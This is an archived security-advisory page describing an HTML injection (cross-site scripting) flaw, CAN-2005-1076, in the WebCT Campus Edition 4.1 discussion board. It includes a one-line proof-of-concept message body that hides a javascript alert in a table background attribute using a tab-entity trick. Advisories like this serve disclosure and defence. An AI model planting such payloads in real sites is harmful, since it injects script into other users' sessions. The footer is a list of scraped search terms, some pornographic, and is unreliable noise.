about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , WebCT Discussion Board HTML Injection Vulnerability


Title WebCT Discussion Board HTML Injection Vulnerability
Published 2005-04-11-12:00AM
Updated 2005-04-22-07:10PM
Class Input Validation Error
CVE   CAN-2005-1076
Remote  Yes
Local  No
Credit  Discovery of this vulnerability is credited to <lacertosum@yahoo.com>.
Vulnerable  WebCT WebCT Campus Edition 4.1
Not Vulnerable  
Code   No exploit is required.

The following proof of concept demonstrates a message field body suitable to exploit the vulnerability:

</pre><table background=java&#x09;script:alert("XSS Warning")>
</table>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 04:27:34 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
big asses www.cnmx12 www.591xil 4.1.11 imap4d free enmal Www+.+Kari DoS Apache mambo+Remo www.Googl. GET /galle gadis tela %5C Telanjang Sql injext 385564.51f 200 /compo phpBB port Ihre Web-S dragon bal news for c WATCH+FREE www.tuijia Apache Chu venus will www.hongxi hokkaidouh World.sex www.sex.pk com_phpsho Japanese proxies to www.sex.pk www.colleg WBB Exploi php-nuke 2 relay file and p m...les2/c www.bian52 Justin Ste www.89.cco www.vuonon WWW.WOLD.S Exploits S EasyPOC.c fadaih.mar Fotos hent m...238/im ironpython